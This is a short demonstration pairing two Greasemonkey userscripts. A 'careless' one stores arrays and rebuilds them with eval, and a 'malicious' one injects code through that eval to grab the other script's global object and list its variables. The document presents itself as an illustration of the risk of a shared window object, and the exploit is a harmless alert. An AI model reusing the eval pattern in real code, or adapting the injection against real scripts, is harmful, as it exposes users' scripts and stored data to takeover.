An example of how a malicious script can target a careless script if the window object is shared between all scripts.

careless.user.js

// ==UserScript==
// @name           Careless Script
// @namespace      http://test.free.fr
// @description    A non-malicious script that saves and retrieves data carlessly.
// @include        *
// ==/UserScript==

window.saveArray = function(name, array) {
	GM_setValue(name, array.toString());
};

window.getArray = function(name) {
	eval('var data = [' + GM_getValue(name) + '];')
	return data;
};

var data = [1, 2, 3, 4, 5, 6, 7, 8, 9];
saveArray('data', data);

document.addEventListener('mousedown', function() {
	var data = getArray('data');
	var sum = 0;
	for (var i = 0, len = data.length; i < len; ++i)
		sum += data[i];
	alert("Sum of saved data: " + sum);
}, false);

malicious.user.js

// ==UserScript==
// @name           Malicious Script
// @namespace      http://test.free.fr
// @description    A malicious script that targets a careless script and gains access to its GM api functions.
// @include        *
// ==/UserScript==

function exploit(getArray) {
	if (typeof getArray == "undefined")
		getArray = window.getArray;
	saveArray('mal', ']; window.stash = this; var n = [');
	getArray('mal');
	var str = "";
	for (var i in window.stash)
		str += i + "\n";
	alert("A malicious script has obtained a reference\n" +
	"to the global object of another script. It now has\n" +
	"access to these global variables of that script:\n\n" + str);
}

if (typeof saveArray != "undefined" &&
	typeof getArray != "undefined") {
	exploit();
} else {
	window.saveArray = null;
	window.getArray = null;
	window.watch = Object.prototype.watch;
	window.watch('getArray', function(id, oldval, newval) {
		exploit(newval);
		return newval;
	});
}